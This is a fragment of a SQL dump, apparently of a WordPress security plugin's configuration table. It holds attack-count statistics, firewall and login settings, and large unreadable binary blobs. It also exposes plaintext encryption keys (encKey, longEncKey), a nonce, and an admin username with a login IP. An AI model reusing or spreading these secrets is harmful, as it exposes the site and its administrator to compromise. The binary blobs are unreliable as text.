A���s��?��C9����`�r���0É�����\0��1��y�i�N7,N]�8�Ϫ��������C�,01�Sͭ�-�a��b���pY�x{Vc�o��lNG�qlkb�����a��ñԟ�yb��@�Y���(J5}׸d�t`Mu���Ƃ�Uz[�w\\=ʼ\0[\nK�ix�-b>��,E�d�Ҕ�\nN�-���\0�9�pM0+��~0��:6r½c��	��h{�M\\����J��,�k\r?��O\Z/ކf���?�xȃ9��\rQP@\r��\Z���S�z�\n��E�O����wF.P��)n>��<���W��S)���_�]����Y�a�\'kY����_ot�r�)��C����E�I�m/�;����g�g�ŭ��Ʊ��0`���8^���\\��Ƌ�~���~�J��7$kSsYme(�|��.��ŹzZ��[����몾l�c�읋���q�oן���K�֛+���%�؂�!a�29\n����`�F_h��*�y��.�Z�ۭP�0��\"��j����=xat\\K��h���9����wǏ���;Z)���K�~���Q�[::��j�s���^Z@2n��ve)e_��u���!�9�]�we<���΁�iJkN���uM��ٍ��O�I0x{M�y�R\r�~��S���BST����h�Zs�*����[?	PO��v��DŌi*�b���*�;ةD�ڨ�n�/N����sh�w��k1]�\':�&e�t��b�t��*�\n\'�Z%��$^���*�B��R_~�;A���k8����\\=�>J����1�~(���Ac�q�o%TF�O-�Gz�JTN>�\'����#.�D�=����a�:��\'j�K�� WHS����`\r�y~E�~|�\nR�i)fl�饔e}�)ld�*�ÀI�F�^��ȯ�ܒ��W���@�~�ݘ�T�`�l�� �9��睪P�k�KV��d��*�X\0M�o��DO=h�W��\0 �7$����R�T�b��z�Hp�f��?�@јݲ�I�����G�]�q�M;��>l\nA���>��k�h���R���8�yO��t�ld�U�^��E�%O��n޹�~}���J[�An>���P:�����7��4iw����q��c�s� @�\"/��š|sP|0��ô����!�J��[h7e�^�J��T�u�V��څ�6���bJ�R�#��Բ�Yu�n�nO�������#�\r�F1_Ң\'�Sz�<�J8�@�b��c�\niz�N�y׊��}˜.��\Z�^�����*�̶=������.�)~��	�_OP�\n�x+��U��1�w��z�)�\"4�+�B\\���II�%�%�\"ЖX����~X4;;�]*�	�&���\"T�QWvRi��d�3�m�`a��3\r�45q$�&Β9QO*z�kB�������jdE,�Tg�OrP~�tgn�g���(�W�{v����^�Z��}ȐC6ݞ��+�?�۸Z�P�d?P�\\����kO��}H�\"F�+:̵LZ�KA�x����r�^/���\'�D�~�4�d���`8`q��׆dŪC*�k]�0ɾ\"���Ͷ#8K���r���|\Z�ゐ5�b�T2���ph=��������j�#�jR����	𪏨�|�z��03��ܸOV1�SlfwV��1	��l?��.\r��ƨ�;p���-�e*���`���[�p5U���ͳ���{���n���!z[�>�f�t4����s^�tE+W�L�կ��C��ҩχH�h�Z;P��.����s.��1��q�+܋\r�4�$Pd�uU1����8���<Kn�s���p�GR�b�:L��0�j}�y�슟W���Sh�5GH�;�V��(��(�\ZB\0�\r�lŗ���B�s�#3�?+��Wp�P�M�k]�<px_�\"R�Lki��G�Ap�\Z\\���?h��8���Q��$�d1��ˌ�GPP�(�Ϟ���S��3Q�?(H|,�;p��H@yƄ��k}�{��[��W{�LG�.�vOǫ�\"�M\r6Ic�����E��,M+,�ǖ��f�� �MP�[�Y&���\r��,���YDx��x����Vތ�\Z��~�VD���Z6�aW�_�tʩk�g�i\n�B�_��[�\0��7��4�w5���q��y����1�Щ3�&�Tt�ȹ��8��=��S�P�y�Ym���m��U�I���O�F	!������q��O�~þ`��Ϸ7�i.K���K�����;��3@��\"��_���d�/5�������%����9�U6>��Nc�V�M�Tp�W \r0�����Z|�\\�T�-��B�D\"�,Q�uܳ��n�����.������A\Z��X�m,��P\r�J�h��x�Q#��\0��tg���F���N���v��&�W\"�IJ�}:���k�S�-e&s�c��1h�ؗ]m3ĺXq�Ï��j�_�y�[+x�E��V0z���xi���\n���F�\n��7��4�欋\\�M�=���O����h������L;�-��F��\0��U��*/����d�.>z_�ME�MՏ-/v��_څc����?,U&��\"��R�[�R����|L���<uQR�V����x�s��	b[�y�i�C��\0����T�q@W~��{�Ṝg�IU9�\0���ڡSw�q�\\(LpR^��_m�o�<e��{�FE�P\n-����,5H��:��@���\r�%��-�����,$y��k�\\�3�딢ߓ{�B2�A����G�<��&%���߼w$���c�TV¶\r�|f�7hC�p\Z��8�w�G�+�dUx��Xc�ѨV�*�6�i(���H�Xw�6[�|�Ja�ʹ�Ж�q^����O�h;xA�3�-\r���hM�>kv7��[���ׇd�̂zR<��2���K�����7�I���I�!1&�j��[6����56i�8��n�t��l�*���?���/]�\Z�4�tX�*���5��2�.p�·�\"�F�6Zؙ\n��$z��z��\r�9`\\&S9�~{-LKŝI�T�i��;�u!���7�U�e�H> -��%G��(�m�\0���DO;��^�K��l����ظ!�/?aF�z��#�U�%f��{�x��i�<��f��;������K�Z9ްN��Wj_�H�]�͚V�I�R[냛�B�w�s��bN}�qY��7zo�U��u�\'���1��k���~P,o���ʂ-~�Bʾ�i>1�/#���#��y��X�oa��\\D�Şheb������h��?)�3��1�u��s��_s�Шd��>V�*R��/\0�����ӷ�~r�%�\"������8lb�κ��\"�7e�E�=n~��͙\'2�C/�����r�\r�̈�\r�;�J�U�ˑ-�\\B��?��	C�Q���c2 G������e��h��h��݌^�@�˶\\},n���ۛ~A�F�,���{�<n�н�>!��2��_U�d~��p��7O\";}���r\0','no'),('currentCronKey','','yes'),('dashboardData','a:4:{s:9:\"generated\";i:1629725128;s:3:\"tdf\";a:3:{s:9:\"community\";i:4203;s:7:\"premium\";i:4410;s:9:\"blacklist\";i:23196;}s:10:\"attackdata\";a:3:{s:3:\"24h\";a:24:{i:0;a:2:{s:1:\"t\";i:1629637200;s:1:\"c\";i:15504620;}i:1;a:2:{s:1:\"t\";i:1629640800;s:1:\"c\";i:18111966;}i:2;a:2:{s:1:\"t\";i:1629644400;s:1:\"c\";i:13446264;}i:3;a:2:{s:1:\"t\";i:1629648000;s:1:\"c\";i:12799248;}i:4;a:2:{s:1:\"t\";i:1629651600;s:1:\"c\";i:13642313;}i:5;a:2:{s:1:\"t\";i:1629655200;s:1:\"c\";i:12995199;}i:6;a:2:{s:1:\"t\";i:1629658800;s:1:\"c\";i:13270603;}i:7;a:2:{s:1:\"t\";i:1629662400;s:1:\"c\";i:13562668;}i:8;a:2:{s:1:\"t\";i:1629666000;s:1:\"c\";i:13150622;}i:9;a:2:{s:1:\"t\";i:1629669600;s:1:\"c\";i:13300472;}i:10;a:2:{s:1:\"t\";i:1629673200;s:1:\"c\";i:13108200;}i:11;a:2:{s:1:\"t\";i:1629676800;s:1:\"c\";i:13024821;}i:12;a:2:{s:1:\"t\";i:1629680400;s:1:\"c\";i:13111045;}i:13;a:2:{s:1:\"t\";i:1629684000;s:1:\"c\";i:13136789;}i:14;a:2:{s:1:\"t\";i:1629687600;s:1:\"c\";i:13209587;}i:15;a:2:{s:1:\"t\";i:1629691200;s:1:\"c\";i:13145860;}i:16;a:2:{s:1:\"t\";i:1629694800;s:1:\"c\";i:17657184;}i:17;a:2:{s:1:\"t\";i:1629698400;s:1:\"c\";i:18880112;}i:18;a:2:{s:1:\"t\";i:1629702000;s:1:\"c\";i:18303310;}i:19;a:2:{s:1:\"t\";i:1629705600;s:1:\"c\";i:18118064;}i:20;a:2:{s:1:\"t\";i:1629709200;s:1:\"c\";i:17847575;}i:21;a:2:{s:1:\"t\";i:1629712800;s:1:\"c\";i:17647186;}i:22;a:2:{s:1:\"t\";i:1629716400;s:1:\"c\";i:17470050;}i:23;a:2:{s:1:\"t\";i:1629720000;s:1:\"c\";i:17148045;}}s:2:\"7d\";a:7:{i:0;a:2:{s:1:\"t\";i:1629072000;s:1:\"c\";i:391201440;}i:1;a:2:{s:1:\"t\";i:1629158400;s:1:\"c\";i:343907803;}i:2;a:2:{s:1:\"t\";i:1629244800;s:1:\"c\";i:279960455;}i:3;a:2:{s:1:\"t\";i:1629331200;s:1:\"c\";i:333771574;}i:4;a:2:{s:1:\"t\";i:1629417600;s:1:\"c\";i:408209567;}i:5;a:2:{s:1:\"t\";i:1629504000;s:1:\"c\";i:385433611;}i:6;a:2:{s:1:\"t\";i:1629590400;s:1:\"c\";i:356225221;}}s:3:\"30d\";a:30:{i:0;a:2:{s:1:\"t\";i:1627084800;s:1:\"c\";i:311866019;}i:1;a:2:{s:1:\"t\";i:1627171200;s:1:\"c\";i:320312694;}i:2;a:2:{s:1:\"t\";i:1627257600;s:1:\"c\";i:317207572;}i:3;a:2:{s:1:\"t\";i:1627344000;s:1:\"c\";i:336084581;}i:4;a:2:{s:1:\"t\";i:1627430400;s:1:\"c\";i:332561956;}i:5;a:2:{s:1:\"t\";i:1627516800;s:1:\"c\";i:355467602;}i:6;a:2:{s:1:\"t\";i:1627603200;s:1:\"c\";i:392766643;}i:7;a:2:{s:1:\"t\";i:1627689600;s:1:\"c\";i:382675490;}i:8;a:2:{s:1:\"t\";i:1627776000;s:1:\"c\";i:387472892;}i:9;a:2:{s:1:\"t\";i:1627862400;s:1:\"c\";i:360459684;}i:10;a:2:{s:1:\"t\";i:1627948800;s:1:\"c\";i:341596137;}i:11;a:2:{s:1:\"t\";i:1628035200;s:1:\"c\";i:305258486;}i:12;a:2:{s:1:\"t\";i:1628121600;s:1:\"c\";i:319420248;}i:13;a:2:{s:1:\"t\";i:1628208000;s:1:\"c\";i:433022622;}i:14;a:2:{s:1:\"t\";i:1628294400;s:1:\"c\";i:408774402;}i:15;a:2:{s:1:\"t\";i:1628380800;s:1:\"c\";i:392753888;}i:16;a:2:{s:1:\"t\";i:1628467200;s:1:\"c\";i:395395353;}i:17;a:2:{s:1:\"t\";i:1628553600;s:1:\"c\";i:396072279;}i:18;a:2:{s:1:\"t\";i:1628640000;s:1:\"c\";i:392005395;}i:19;a:2:{s:1:\"t\";i:1628726400;s:1:\"c\";i:399325997;}i:20;a:2:{s:1:\"t\";i:1628812800;s:1:\"c\";i:420193316;}i:21;a:2:{s:1:\"t\";i:1628899200;s:1:\"c\";i:402175405;}i:22;a:2:{s:1:\"t\";i:1628985600;s:1:\"c\";i:340806295;}i:23;a:2:{s:1:\"t\";i:1629072000;s:1:\"c\";i:391201440;}i:24;a:2:{s:1:\"t\";i:1629158400;s:1:\"c\";i:343907803;}i:25;a:2:{s:1:\"t\";i:1629244800;s:1:\"c\";i:279960455;}i:26;a:2:{s:1:\"t\";i:1629331200;s:1:\"c\";i:333771574;}i:27;a:2:{s:1:\"t\";i:1629417600;s:1:\"c\";i:408209567;}i:28;a:2:{s:1:\"t\";i:1629504000;s:1:\"c\";i:385433611;}i:29;a:2:{s:1:\"t\";i:1629590400;s:1:\"c\";i:356225221;}}}s:9:\"countries\";a:1:{s:2:\"7d\";a:10:{i:0;a:2:{s:2:\"cd\";s:2:\"US\";s:2:\"ct\";i:1180485393;}i:1;a:2:{s:2:\"cd\";s:2:\"DE\";s:2:\"ct\";i:274427461;}i:2;a:2:{s:2:\"cd\";s:2:\"FR\";s:2:\"ct\";i:259207068;}i:3;a:2:{s:2:\"cd\";s:2:\"IN\";s:2:\"ct\";i:223940719;}i:4;a:2:{s:2:\"cd\";s:2:\"SG\";s:2:\"ct\";i:185060906;}i:5;a:2:{s:2:\"cd\";s:2:\"CN\";s:2:\"ct\";i:161961662;}i:6;a:2:{s:2:\"cd\";s:2:\"RU\";s:2:\"ct\";i:158874115;}i:7;a:2:{s:2:\"cd\";s:2:\"CA\";s:2:\"ct\";i:121547699;}i:8;a:2:{s:2:\"cd\";s:2:\"BR\";s:2:\"ct\";i:120754220;}i:9;a:2:{s:2:\"cd\";s:2:\"GB\";s:2:\"ct\";i:119483856;}}}}','yes'),('dbTest','a:1:{s:5:\"nonce\";s:64:\"9917001807e5a4c3491ff5ef96a5ee6c0a8ddfa7d7504a56ced09edc50e49248\";}','no'),('dbVersion','10.5.11-MariaDB-1:10.5.11+maria~focal','yes'),('debugOn','0','yes'),('deleteTablesOnDeact','0','yes'),('detectProxyNextCheck','1629585261','no'),('detectProxyNonce','','no'),('detectProxyRecommendation','REMOTE_ADDR','no'),('diagnosticsWflogsRemovalHistory','[]','no'),('disableCodeExecutionUploads','0','yes'),('disableConfigCaching','0','yes'),('disableWAFIPBlocking','0','yes'),('dismissAutoPrependNotice','0','yes'),('displayAutomaticBlocks','1','yes'),('displayTopLevelBlocking','0','yes'),('displayTopLevelLiveTraffic','0','yes'),('displayTopLevelOptions','1','yes'),('emailedIssuesList','a:0:{}','yes'),('email_summary_dashboard_widget_enabled','1','yes'),('email_summary_enabled','1','yes'),('email_summary_excluded_directories','wp-content/cache,wp-content/wflogs','yes'),('email_summary_interval','weekly','yes'),('encKey','fdbe7f8c7b4f87d6','yes'),('fileContentsGSB6315Migration','1','yes'),('firewallEnabled','1','yes'),('geoIPVersionHash','a1214acac1b3109ae51eae6349fb045cef4b53346ee65840edbf84fa0fad9677','yes'),('howGetIPs','','yes'),('howGetIPs_trusted_proxies','','yes'),('isPaid','','yes'),('keyType','free','yes'),('lastAdminLogin','a:6:{s:6:\"userID\";i:1;s:8:\"username\";s:5:\"admin\";s:9:\"firstName\";s:0:\"\";s:8:\"lastName\";s:0:\"\";s:4:\"time\";s:28:\"Mon 23rd August @ 09:53:51PM\";s:2:\"IP\";s:13:\"103.70.171.66\";}','yes'),('lastAttackDataSendId','202','yes'),('lastAttackDataSendTime','1629308435.351410','yes'),('lastBlockAggregation','1629727413','yes'),('lastDailyCron','1629727412','yes'),('lastDashboardCheck','1629727413','yes'),('lastNotificationID','198','no'),('lastPermissionsTemplateCheck','1629727422','yes'),('lastScanCompleted','ok','yes'),('lastScanFailureType','','yes'),('lastScheduledScanStart','1629498617','yes'),('liveActivityPauseEnabled','1','yes'),('liveTrafficEnabled','0','yes'),('liveTraf_displayExpandedRecords','0','no'),('liveTraf_ignoreIPs','','yes'),('liveTraf_ignorePublishers','1','yes'),('liveTraf_ignoreUA','','yes'),('liveTraf_ignoreUsers','','yes'),('liveTraf_maxAge','30','yes'),('liveTraf_maxRows','2000','yes'),('loginSecurityEnabled','1','yes'),('loginSec_blockAdminReg','1','yes'),('loginSec_breachPasswds','admins','yes'),('loginSec_breachPasswds_enabled','1','yes'),('loginSec_countFailMins','240','yes'),('loginSec_disableApplicationPasswords','1','yes'),('loginSec_disableAuthorScan','1','yes'),('loginSec_disableOEmbedAuthor','0','yes'),('loginSec_enableSeparateTwoFactor','','yes'),('loginSec_lockInvalidUsers','0','yes'),('loginSec_lockoutMins','240','yes'),('loginSec_maskLoginErrors','1','yes'),('loginSec_maxFailures','20','yes'),('loginSec_maxForgotPasswd','20','yes'),('loginSec_requireAdminTwoFactor','0','yes'),('loginSec_strongPasswds','pubs','yes'),('loginSec_strongPasswds_enabled','1','yes'),('loginSec_userBlacklist','','yes'),('longEncKey','6239b0278b30a301b865b726e676f373eaff04ff9f9d5c0c042ecc737383a822','yes'),('lowResourceScansEnabled','0','yes'),('lowResourceScanWaitStep','','yes'),('malwarePrefixes','�\0\0\0\0\0\0�y8�\0�ٗ�Ν;˽sIYJ��BR$RI%Q�D�ZHJ!I+�J��H����i!*)�EE+�&~����y�y��3��3>�nj�\no>^��\'�_wB�x�1�uO�\Z� �%�e\r�?�EC��)���M�>��8)��}��uׄ�-X����1ff��m\0��\0��\0�r�a?\0xG7\0?��)��`��\0�4��D�K@�bH�\0Y�+ gZ\0�p\Z������\0��@1�Pt���180�\0�v6���. �);����ռ\Z@U�	��{\0u���\'�����@p_���F��\\q4��\0Z.=���_��\r0h�����t&�:A��!��\0]�߀�\n@7�\0��b?�g��]����;�a�l`�,[�0�`��`x�,0�`00��a����$`d�0Z�U\\\0�>��K>��&�)���/��S5��)�;0����r��=	��7�?�����`\\C`9��*XXՐ���d`��~`�6L�XK�֗_�W�6$`�����t��t/�<$p�8�7�O�\0��`�m0m��.V!����kH,�\Z����H�f�~�x8�9�����u��6~����\\����\\�`��w�<�:`^s0��\0,?\0,H{\r,8�,(N\0\\Y\0,��x,�x�\0�cO�Ӏg�#`��-��u७xx�s��/�]�\0,�%|����l���0��,���Y���g�8`����р�����]���C��\'v\0�k܀\0�& `O,�:	X��&\"@`�H h�4 8Z��܁��s`��I�\Z0XӺٛ�A@XPv�/6\"�J b�\Z \"k\0X���:��\0����Q �U5d��DG]\06=]ln��X�[V�@�.�E�����$��������.�-�ض�,��; ~�j >��N�u灄��@B�#�8�H�7H|;؁.v����+�$� i�?�s� �+\n��	؍,v4{���f7�g�o`��>�w`��^`_�N`��R<�)A��=��q���R M�6�f0\nH�/\02�K�g; �c\"�9P�0%k��Ӣ���@��D g�= �3pdQ!p��4p�Y�����@�zs �����p�N\Z�\n��t_�T�p�[B�@��I�p�m���\Z��=(��n��1\Z�Y\Z{���{%\'F�|�\0�*^�&�������)���@��(�2(OR���˧���w&W��\0��`��m=P�2��@��k@�F�:�P}��|���7:������S�����[9Z�]�r�ә\0�5G�f6\0�|�}E$p��@�x�xx8�2���/��4h�txt��8S4�π�cÀ�Q��G������^@��6�y� �<xaj��\rxi9x9Y	��^���^Kږ�m�b൷=�:$x�1x;r�)Юc��\r���	|hK:�́O|�ϻu�/���o�����]��#�[�?�@��@�����=��\r��_��Ǿ��U�����7c\"�oN)0��K��K 4M��?�Ч� |�c�@ĺD���h�-�/1\'��q�ĝ��x��x6$/�E�.���8(Z;]�ˢ@��@k@��$P2�����[߀2�hP�u:H�D�T�3���@f�\'�{�� G��ܺP��\0U�AUR\0���������~P-�E���n8��Uj饁Z��Z�|A��M��~!��Uj?�j?{*�\r���:��A��-��vpp�)8D��W�Z;�������@W��h��84-zq	8l�0�p�4�N\r_[���\r�p?8�X����\Z}M\0�]A��;A��	����@�8����.8\Z\\��}�Z����� м��{*gp�b8��\0h9v>h��h�5����JN\0�����@k�h��\rh}��������lmN^m�A�oE��/�@;�~��U8i�?�>&��/\'?O\0�|D@�@\'pZ���z!�<�8=�]#~�3g�3�G�35\r��+G�Y�n�n����_A�����!8��X����yE������������\r�$%�!o=��=Ꟁ���g��p�\0��/��y�h�ApQ�\Z�K���:R.��.���n���烾��K=��G��K�T�k���e�W�d�+�OW|��7]W>����G0آ��4W]\0W�X	���{0���?^��X�uǀ�#߂�������!��M��u+>����o��Q>���3��F�4���\0�^5	�>�	F>n���\\]�< ��\r\np��Lp��+��Vf=�u�7�m�2p[�Wpۉ}�\'0nb�����\0����I�`’,p;�Ll��6��G��X)���&��\n&�?w}H����{{������=\0�߯�*S�x��-��e�`ڑ+`�r0�\r�>hxp�D0�[=���*p灇�^\0�R�lU�ݞ\0�\0s���1��c/����U`�\"3�8_R\n��̛�\0�5�������12� y6X��,��<�x��9���*XX�,��`�3%O���M�Y+s�<�&<��\r,60K�@��0<��0lX��e�3��J�B��0�+�.+�g������)7�gxy�E��\\��H��+��FE�W����o��?�E<���k�C���9u���5�����,���ޮ�o��wu�w�^�Ƹ������\'�����Р�	>\nj�\0}qw���=�`S�=�-�{(�\'o��i�$l���-#g����/����_�$�//Ԃ��+�W�?�����u\0��	�s�ߵ���z����{�^�C��ct<�1<\0�v�����m�ON�����s��ۧ�O/�� �����~�U��>}8��X	v�]�:��X\nv�{�D�{�N�?�1���b��o��2_�W�v�W���u6���\Z��#����?�࿲0����k;��W; ����47C���p� #���\n{�0\0�v�|���!�b9�.y� l����1��m#!r�\'��\Z\n��!ѼXH�%�:+!驫���[Hfɾ\\��SŐ��-D\ri���\'!���h�)1Rj/��w, ά��!�?H0�	VG!a�$��49� �wA��4_HG{��O\r��\r�t��<��{\r���˟�}����W���wo��@C��A�ܞA�|A�J�a�� Â+Ј�5��Yrh��#���\Z��\n2�%!�Fi-�F�F\'��L�4Bcd%И+ 3�dȜ\"���]��-��8�$Ȳp*dY�BV�@�\'�C,t �$dm�MX�� ��k �����E��rHQB�sS��iِ�hڪ����7ȹ�;���l�\0��\0M\'C�h��.�ճr]=r�r}��5*�=�$4O��_<	-��<�C �$�IxA�s]���4h��Bo3h�=Z4|=��+���Sȫv\'��y�ZCK<�AK��%ի!�!� �x��}����\Z ��� �7w����OfB+�\r@+ch垅�ʻá�o@+{C���P`�;h;Z5�Zդ�����\"h5�v7�V��B�/�Ck��\Z�PH�(t:��_����d�(��!��;�~�h�R	�,�	5�brnA��VB�+>A[��C[w|��,=�I$�03J�9\0%��\nm�j����Ў�(ɴJ��%m�/�%��\n%_�vM�\n�����q������OA)g_@)/ڠTq%t���V��O|\0L��	�\ne��A�fYP�(����9O�p�y(kH�k��CG8tdit���ȓ�(g��{�k	_�\r?~��ʷ̀�#G@�C�w�C\'�_�	���	�YЉ�[�����*�Z�j}	�B��CE�T�9*�>*�	Ag\n~CŊ�Pq�*�?*)̂JN�ι*�sw�C�cʠ�p�|�7t��T��2T�AW�A3��%/	t�	UM_U�q��n]]M�B�G�k	��k��C5��\r��P�Gts�c�L�X��9\0�i��:� ��:�׮ݏ�������z��j=��5n��\'BO�@����@��uPwj3���%Y�k�\r�z��M�z�mrԾ9z���q�����eԑiu�\nuz��:�ʠO�Z��~MЗ����oз�F��N��r��	u�������{_�ks��3zPoU�s�m�g�aWA<R�>�{п�l��F���a�4���q0�z�m�`��F��u�w���`�&�/Ä�r���܂I`L�������(�	����[KM�%\'��Kɰ�,\n���e�?a:*��_��F7`e�V���&0C�`N�s��`��˰��qXX��ΰ�t5,4�\Z�dX�Ck���:\"�u|&�:m��Px��}>���!����]��{�C�����0�<��6t>�<\0�4�\0���9\r�`�Ol\\k	�|��M�Y��^���$6w���h�-���V6k`��E�x|�=غ�lS�4��m�6¶_��R��ė�n�>�~�!<9�v�};\\4�\r��S�o���i�Ӫ_�ӞR���(�y�\rع��B?�]��*��q�	��gN�\r��0�gfn�g��nR`�����b��xN�<�P��=�w�/ج�=`]x��x�>xѹ��W�?x��}x�[��.��|t�}F$����qx\r��0��Px�����C�e�xxY�jxY�+�Oo�U	�����\r��K�a�����g\r���\0^Yp�	ژÁk���\Z��`>޸^=���E������}A�a�p�[���mሳY����p��y1	����#�o�Q3]��8�t�1��1�������l�!���ǂ�������;x[�(x�6�sy\0Ǐ��W-��__��;���hxǑ�pҴhx\'��>��v�#��y��;�8���x_�{T�I����S��q�k��C�7��4[N[��_n��o����[��\r�s78c�6���g�	gf���K:���#�M�>�Q�>z�>f�>�L�yG��pޣ�p����	\"\n>�p>�>��	������,��;§N��]Y��E��\"�H�̰��ٚ��mK��..Yu.�9>�r|��<��.c��S���\rp���!p�m\\u�!|��1�Z�%�&g.|��\r��µ�p�v����-#�62�ck�qk����u��.s����We?�q�<�����m@�>�n�7�o���Ï�V�M�Z�ǧ�Of��ͻ����g5��w���~Q9n=L�/=��W+��W�?�U���H����^�]�-��߫w���6��X���F��;�~)��o�5x*���o��Mg��w�r���\r��ow��w?6�{\Z��=�s�1��ý:���˫�_�#�_�\'�����?^��K��#�_��p��?[<�\0���>�\"@�n�>���7���So#h�}=���D���^q!�D<9\0�ND$�!��/��R��9!����&��MD���u$B��O�#J����a�L�}؊p�o���G_ �sW�ND��Q�G�Dxv\nѲ��hE� Z�m�LD���n_�h\rD�� ���Gt��Ct~5\"�����ŝ��oD��D����G1�{��NF�>�@�!��!�1�����\\w1\n�@�֚\"F}��v����蟦��}bڸ��\'2f�>bVe��K& �^o�]�\"u\'2����[j��������X*G#��g+ub�������	�%Ґ�u}��\\d��aȤc+{{	2e����q�{q(�F�!N:��i�a�yC�c*�|<q>�q�rq9}��<�^����	2���Պ���%�Y���[�7�1�3�\Z2����j\"2�B\Z2��)2�������3�D�﹇̯Z�,��x��!a%�g��s�x��,ܾY�!^��o���@��#KjZ��	�R}Cd�U���C���2��h$�g����A��� +N�B�UYH�*Yٽ	\\�	����F�m�U�?�U�4�(ІǝE�O�BV��EV7C�Lđ5G�	)X��N[��֤#�KA$�Zd�n�n�sd�\"Y���T�l\0��h�$:�]q�q�G6��Ȗ)�ȶ�Ñm)�x�j$��$,Z�$���$$E�����w�7J�$�,$�\r�s�ٹ��|����\"{��!{�u���W {�#{?mF�]@�Sϐ��> ��� )��\")�����\ZER��CR�7\"\"� �#i[� u���$$s�x�и��a�.�pb3�u�E��: ٽ��{��޻������ȱ��H�6=���!yb��J9y�9Ym����i�E�hrr��\0r&�\n9S�9k�9;�3r��R<�)��EJ�,�s}<R:�7R�>�P���͡���gH�D����8����rI�\\?\Z�<�B.�!W^k#��� �w�*�&�*��:aR�%�NmDj��Gj�n#7:J�Z��H��H�o䦤�َ ��!���QH]�1r/[��{\'r�-����4�#��U\"��5H���)�G{�ȓ�7��{���ޅH�ȳ,K�e�$��1�¿yy�yE�!m�H��8���\Z��e�&Nyk�y��yw�y�ꁴK;���H{m?�8��C����\\��v�=D:_�\"�V|C>��@>�8��B�,[�|)�B���@��.B���|�ь��F~���h� ���ހR�7��-���4{��>z�}���U���@�&; }K�H�3����	�_p�o�������(��\'\nu���:	E��ʛ(\Z�Ek�(�tBq�(Y����EŢ�ش��?�ʮOD����B�3�PF/e>c(ې�r#�P��pTs�d5ܨA�<~���P�q*T��/��2��ߠz�P��RT��7�?�F�����٨�Aj-B��CGOG���I�q��:�l�LP�f��Q�C�PB-���]j��5:��\":�7�\"j�\Z@�\\�Va7��{e脕��5�����c�Q�}cщ��>�N޲�ǡ�uPǙCQ��:�T�g�i�xt����=u)�B]ζ�ӱ2t�z=�x:Ct�ɖ�n���[e;:���Ξzu{	�S��΍[��뚌�|�.0��z� �{�zT�.�=\r�ђ�>�E�o���6����[r�k�DW4�E����������Е���+=�+�`te�>��ڄ�JnD����գo��/;�!cס�ޛѰ\'4|G,\Z��]k�]?�-�!x��\ZI8����\'�E7��\Z�i.B7��E7���/1hlc9�5e\Z�*G_�	�S��_���/��[Sѝ�5h�Lc4����%Cw���nE\r��>�}��7n�o����5��wM1�@S�mBS�X���BS���G��Ѵ}Uh��z0V�f�|�f��@3�բ�l|��#���\nѬ1uh֭�hV�4g��M@s�\"М�X4�e(��a$z�d4����-�E����(F󲖡�3t�|��h~�4��=qFO��CO�m@X-ЎEƬCN�FO��BO{FO�?��$�%������Z�B�0�L�\rZ�t-�u-+�������G/�e�W�����\\��޷�U���U���aNh5���rF�+��k�k%��{��k_����X�z�bZk�֮qBoR����^���z�v�(�Κ����}��}Wz?&\0}([�>\\��>�h�I��a�6��G���h�m�T�>��G��u�S���3}Vb��씢-���w�G��9���z���Or\"��5}5�}e݇�Z�}�}=�	}=���Q(�nrm��\Zmc��OtE���D?��G;l�G/�c���,�v�}B?�߃~�<�\Z�~i�F�jMF��_D��F���F��\rh���u���ȣݣ���C��s�ў���/�ץ��F�t�B�����C�!S�T�o֍�G�@�3�����\0R���O0�\Z����cX{������_~?\r#�]0��;��v�D�yLl���}�0�lLb`�I��b��w1ن����Q�y�qS\Z�ĸ32�/?��j�b��N�z�-L}�S��a��S��O�5����i�b�U�0��	��Ssl�n�{ Ӄ0��?1��W���I���H���SlhB\"6,~\r6�[fZ�\r�/��_����*�F����[�O��5���/���� ̴&c��/k�{�663\Z[�g��T�Y�,�1��l��Ll|�-6a�	f3�/f3�f˿�l�1ۨ��������$�6��6i���Y�MY�M)��9�a�m���a7���C�i�6�;�2s�Ha�?����،#��Y5 �&�ܨc��n̝s���gbs�+������ߞؼ�7ؼo?��6�q)�\0��-h��<�as�1��=����g�R����[�S�y��Ńa�������%?�`>�K�e��a�&]���b+z���!�����tލ�|5|q|{[5e4���:��\\��g$Bta!�����X����L�ª�`�g���ᳱ�uغ��u�؆ǽ؆g�\r_���]�X��X��Xtq>��܄m��m�mN8�m>t��۲��=����Ƕf����Z��I\rX�x�p=��K���m��a�U��*����x;K�%ݷ�v��Œ�Yl����b��plϔ5؞��ؾ���Ik��LK=i���.�\'`��ð���X�����4,3x\rvh���찏?�e�˺n�e�b�i4�c܃��;�N��-�Ž�:���c����<t�\'��婶byw\r�|h!v�;	��N���?�\nDc��-��t�`E�qX�u.�&�3��ؙ�u���,V�JNJ���-!Xɡ�XI�e�\\�F�t�9���+���J�i��꿼%��D��u��!%V������*n�*���KZ�إo[��z�ؕ/Xe�n��;�]�f��?n`�mO�k\'7b�\rcח�b�o.���\r�jb��={����\r�U�\r�c؍;؍�X-7\r�}������	�]=����!��:�Z����%��ѵX��9X�%�5B_�\'�]Xs�%�lt�,<k�V���2�Z��X�3����b���c/Wb//Ea��-��0[��7�w�����g�}o���>��ľ*����X��j�+{2�]���,�~G��ҰQY�/,��\\������vZ����?N����#���H�o�B������,��܇;q�������\0G<�q\\�\'M\'��q�	\\rk.��ҟSq��hj�Y�h��ӊs��qu�F\\(݂kt��\Zc�m��k߶�5�:��:�p�\rJ|��>d�5>d�[\\�R���z۾�z{�p��6�~�]���i���B|��>��V��Gtō��q~n��nrt=>*�<>�D%>��M���O�t`�]���8��ռ�͇|��m���,n�m�[���؄p|l�;|z\n�<����Oŭn���u���=��w8�v��\'T��mln�6�z���[�M�-n�	����]7�v�zp�w�����`k|J�O�?w[�;M���;Mq�#\r�Ԙd|jZ��݅O���;��]��K�>�0�n������0�g��g�E��\0O|Vw%>;�\Z>��7�n����,>��5��>_�e/����y���[�/�؏/|�\n_�q�z�{u�^\Z��0�vƽ/V�>ǃq�O���K�R�6|��2�����\n�)���S���kp�\'^�ʐ�x >_�%_�5z�	�i��^p_�p4:���}_�����ã��Oj�{3�O��u���:u:�a�y|��	x�uxd�<�xYa�G��7\ZN�7޿�Gs���?1�&�5x��g<&��y�\Z�i��o��|��ee4���6|��qx�j|���zi(�m	�����^��4���t<���a<�6|G�G<�5�s�|g[%�����;O�u��W��2��:��2�h���5|/��ﻢ��?�O	��Sҏ�Z��TO-����xz�&��~~0x%�1E�g,��3��	����OxfC<~ȁ�-X�d���jO��/�ŏx�ŏ\\{�y4�E��5�۞�� ��ʇ�ɠ9��T/?/�Z�\\?����৭��wO�O�i���Ow�ƋػxQ��]n����b�\"�x�m�������a_���e�y�?~��?�	